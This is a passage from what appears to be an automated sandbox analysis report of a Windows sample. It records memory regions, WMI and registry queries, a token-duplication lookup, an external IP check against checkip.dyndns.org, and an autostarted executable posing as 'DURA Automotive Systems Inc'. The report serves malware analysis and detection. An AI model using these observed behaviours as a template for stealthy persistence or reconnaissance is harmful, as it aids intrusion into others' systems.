|
- |
| pagefile_0x0000000000c60000 | 0x00c60000 | 0x0205ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002200000 | 0x02200000 | 0x0223ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002240000 | 0x02240000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x02250000 | 0x0251efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002520000 | 0x02520000 | 0x0451ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004520000 | 0x04520000 | 0x0461ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004620000 | 0x04620000 | 0x0477ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004630000 | 0x04630000 | 0x0466ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004670000 | 0x04670000 | 0x046affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000046e0000 | 0x046e0000 | 0x0471ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004740000 | 0x04740000 | 0x0477ffff | Private Memory | Readable, Writable |
|
|
|
- |
| kernelbase.dll.mui | 0x04780000 | 0x0483ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000004870000 | 0x04870000 | 0x0496ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04b0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004b30000 | 0x04b30000 | 0x04c2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04d2ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004d40000 | 0x04d40000 | 0x04d7ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004db0000 | 0x04db0000 | 0x04eaffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x050dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04feffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000050a0000 | 0x050a0000 | 0x050dffff | Private Memory | Readable, Writable |
|
|
|
- |
| custommarshalers.dll | 0x60350000 | 0x60364fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.windows.forms.ni.dll | 0x6b1e0000 | 0x6bdbdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.ni.dll | 0x6cec0000 | 0x6d65bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorlib.ni.dll | 0x6de00000 | 0x6e8f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorwks.dll | 0x6f050000 | 0x6f5fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscorjit.dll | 0x6fa10000 | 0x6fa6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.management.ni.dll | 0x6fc70000 | 0x6fd73fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| custommarshalers.ni.dll | 0x6feb0000 | 0x6fee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fastprox.dll | 0x70b60000 | 0x70bf5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrtremote.dll | 0x74410000 | 0x7441dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x74420000 | 0x7445afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x74460000 | 0x74475fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x74590000 | 0x7459afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoreei.dll | 0x745a0000 | 0x74619fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mscoree.dll | 0x74620000 | 0x74669fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr80.dll | 0x74cb0000 | 0x74d4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74ee0000 | 0x74f5ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x74f70000 | 0x74f77fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x74f80000 | 0x74fdbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x74fe0000 | 0x7501efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdsapi.dll | 0x75120000 | 0x75137fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemsvc.dll | 0x75140000 | 0x7514efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wmiutils.dll | 0x75150000 | 0x75166fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemprox.dll | 0x75170000 | 0x75179fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemcomn.dll | 0x75180000 | 0x751dbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wbemdisp.dll | 0x751e0000 | 0x75210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x75220000 | 0x75236fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| microsoft.visualbasic.ni.dll | 0x75240000 | 0x753dafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| system.drawing.ni.dll | 0x753e0000 | 0x75567fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sxs.dll | 0x755d0000 | 0x7562efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x75730000 | 0x7573bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x75740000 | 0x7579ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x757d0000 | 0x7586cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x75a00000 | 0x75a8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75a90000 | 0x75aeffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x75af0000 | 0x75b24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x75be0000 | 0x75d3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x75d40000 | 0x75dcffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x75dd0000 | 0x75e7bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75e80000 | 0x75ec5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75fb0000 | 0x760bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x76380000 | 0x76389fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x76390000 | 0x76412fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x76480000 | 0x770c9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x770d0000 | 0x771bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x771c0000 | 0x772bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x773c0000 | 0x77416fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77670000 | 0x7773bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000777e0000 | 0x777e0000 | 0x778fefff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000077900000 | 0x77900000 | 0x779f9fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77a00000 | 0x77ba8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x77bb0000 | 0x77bb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77be0000 | 0x77d5ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007ef40000 | 0x7ef40000 | 0x7ef4ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007ef50000 | 0x7ef50000 | 0x7ef9ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 46 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (13)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WBEMLocator | IWbemLocator | cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| Create | WbemDefaultPathParser | IWbemPath | cls_context = CLSCTX_INPROC_SERVER |
|
3 | |
| Create | WbemDefaultPathParser | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
5 | |
| Create | WBEMLocator | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 | |
| Execute | WBEMLocator | IWbemLocator | method_name = ConnectServer, network_resource = \\.\root\cimv2 |
|
1 |
File (5)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Users\kFT6uTQW\AppData\Roaming\aap6.exe.config | type = file_attributes |
|
2 |
Registry (31)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Impersonation Level, data = 3 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Wbem\Scripting | value_name = Default Namespace, data = 114 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = ProductId, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | value_name = DbgJITDebugLaunchSetting, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework | value_name = DbgManagedDebugger, type = REG_NONE |
|
1 |
Module (54)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x77740000 |
|
1 | |
| Load | C:\Windows\Microsoft.NET\Framework\v2.0.50727\\wminet_utils.dll | base_address = 0x6a310000 |
|
1 | |
| Get Handle | private_0x0000000000400000 | base_address = 0x400000 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x7774ca24 |
|
1 | |
| Get Address | Unknown module name | function = ResetSecurity, address_out = 0x6a311944 |
|
1 | |
| Get Address | Unknown module name | function = SetSecurity, address_out = 0x6a311986 |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServices, address_out = 0x6a3119cc |
|
1 | |
| Get Address | Unknown module name | function = BlessIWbemServicesObject, address_out = 0x6a311a1e |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyHandle, address_out = 0x6a311a70 |
|
1 | |
| Get Address | Unknown module name | function = WritePropertyValue, address_out = 0x6a311a89 |
|
1 | |
| Get Address | Unknown module name | function = Clone, address_out = 0x6a311aa2 |
|
2 | |
| Get Address | Unknown module name | function = VerifyClientKey, address_out = 0x6a312270 |
|
1 | |
| Get Address | Unknown module name | function = GetQualifierSet, address_out = 0x6a311d73 |
|
1 | |
| Get Address | Unknown module name | function = Get, address_out = 0x6a311b96 |
|
1 | |
| Get Address | Unknown module name | function = Put, address_out = 0x6a311b7a |
|
1 | |
| Get Address | Unknown module name | function = Delete, address_out = 0x6a311bb5 |
|
1 | |
| Get Address | Unknown module name | function = GetNames, address_out = 0x6a311bc8 |
|
1 | |
| Get Address | Unknown module name | function = BeginEnumeration, address_out = 0x6a311be4 |
|
1 | |
| Get Address | Unknown module name | function = Next, address_out = 0x6a311bf7 |
|
1 | |
| Get Address | Unknown module name | function = EndEnumeration, address_out = 0x6a311c16 |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyQualifierSet, address_out = 0x6a311c26 |
|
1 | |
| Get Address | Unknown module name | function = GetObjectText, address_out = 0x6a311c3c |
|
1 | |
| Get Address | Unknown module name | function = SpawnDerivedClass, address_out = 0x6a311c52 |
|
1 | |
| Get Address | Unknown module name | function = SpawnInstance, address_out = 0x6a311c68 |
|
1 | |
| Get Address | Unknown module name | function = CompareTo, address_out = 0x6a311c7e |
|
1 | |
| Get Address | Unknown module name | function = GetPropertyOrigin, address_out = 0x6a311c94 |
|
1 | |
| Get Address | Unknown module name | function = InheritsFrom, address_out = 0x6a311caa |
|
1 | |
| Get Address | Unknown module name | function = GetMethod, address_out = 0x6a311cbd |
|
1 | |
| Get Address | Unknown module name | function = PutMethod, address_out = 0x6a311cd9 |
|
1 | |
| Get Address | Unknown module name | function = DeleteMethod, address_out = 0x6a311cf5 |
|
1 | |
| Get Address | Unknown module name | function = BeginMethodEnumeration, address_out = 0x6a311d08 |
|
1 | |
| Get Address | Unknown module name | function = NextMethod, address_out = 0x6a311d1b |
|
1 | |
| Get Address | Unknown module name | function = EndMethodEnumeration, address_out = 0x6a311d37 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodQualifierSet, address_out = 0x6a311d47 |
|
1 | |
| Get Address | Unknown module name | function = GetMethodOrigin, address_out = 0x6a311d5d |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Get, address_out = 0x6a311d86 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Put, address_out = 0x6a311da2 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Delete, address_out = 0x6a311dbb |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_GetNames, address_out = 0x6a311dce |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_BeginEnumeration, address_out = 0x6a311de4 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_Next, address_out = 0x6a311df7 |
|
1 | |
| Get Address | Unknown module name | function = QualifierSet_EndEnumeration, address_out = 0x6a311e13 |
|
1 | |
| Get Address | Unknown module name | function = GetCurrentApartmentType, address_out = 0x6a311d73 |
|
1 | |
| Get Address | Unknown module name | function = GetDemultiplexedStub, address_out = 0x6a3118fd |
|
1 | |
| Get Address | Unknown module name | function = CreateInstanceEnumWmi, address_out = 0x6a311580 |
|
1 | |
| Get Address | Unknown module name | function = CreateClassEnumWmi, address_out = 0x6a3115f6 |
|
1 | |
| Get Address | Unknown module name | function = ExecQueryWmi, address_out = 0x6a31169e |
|
1 | |
| Get Address | Unknown module name | function = ExecNotificationQueryWmi, address_out = 0x6a311717 |
|
1 | |
| Get Address | Unknown module name | function = PutInstanceWmi, address_out = 0x6a311790 |
|
1 | |
| Get Address | Unknown module name | function = PutClassWmi, address_out = 0x6a311810 |
|
1 | |
| Get Address | Unknown module name | function = CloneEnumWbemClassObject, address_out = 0x6a311890 |
|
1 | |
| Get Address | Unknown module name | function = ConnectServerWmi, address_out = 0x6a3124b7 |
|
1 |
Window (3)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WindowsForms10.Window.0.app.0.33c0d9d, wndproc_parameter = 0 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = 18446744073709551612, new_long = 2009146845 |
|
1 | |
| Set Attribute | - | class_name = WindowsForms10.Window.0.app.0.33c0d9d, index = 18446744073709551612, new_long = 3543818 |
|
1 |
System (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = XABNCPUWKW |
|
2 | |
| Get Info | type = Operating System |
|
8 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 |
Mutex (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = appdata, result_out = C:\Users\kFT6uTQW\AppData\Roaming |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = checkip.dyndns.org, address_out = 216.146.43.70, 91.198.22.70, 216.146.43.71, 216.146.38.70 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 68 bytes |
| Total Data Received | 262 bytes |
| Contacted Host Count | 1 |
| Contacted Hosts | checkip.dyndns.org |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | checkip.dyndns.org |
| Server Port | 80 |
| Data Sent | 68 |
| Data Received | 262 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = checkip.dyndns.org, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = / |
|
1 | |
| Send HTTP Request | headers = host: checkip.dyndns.org, connection: Keep-Alive, url = checkip.dyndns.org/ |
|
1 | |
| Read Response | size = 4096, size_out = 262 |
|
1 | |
| Close Session | - |
|
1 |
Process #8: dura automotive systems inc.exe
369
0
| Information | Value |
|---|---|
| ID | #8 |
| File Name | c:\users\kft6utqw\appdata\roaming\dura automotive systems inc\dura automotive systems inc.exe |
| Command Line | "C:\Users\kFT6uTQW\AppData\Roaming\DURA Automotive Systems Inc\DURA Automotive Systems Inc.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:45, Reason: Autostart |
| Unmonitor | End Time: 00:16:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:13:17 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x530 |
| Parent PID | 0x43c (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
534
0x
754
0x
788
0x
7E8
0x
510
0x
540
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00070fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0009ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000affff | Private Memory | - |
|
|
|
- |
| dura automotive systems inc.exe | 0x000b0000 | 0x000effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x0010ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0011ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0012ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00130fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x0017ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00180000 | 0x001e6fff | Memory Mapped File | Readable |
|
|
|
- |
| l_intl.nls | 0x001f0000 | 0x001f2fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00200fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00230fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sorttbls.nlp | 0x00460000 | 0x00464fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x00470fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000470000 | 0x00470000 | 0x0047ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | - |
|
|
|
- |
| sortkey.nlp | 0x00490000 | 0x004d0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000004e0000 | 0x004e0000 | 0x004e5fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x004fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x005fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x006bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
- |
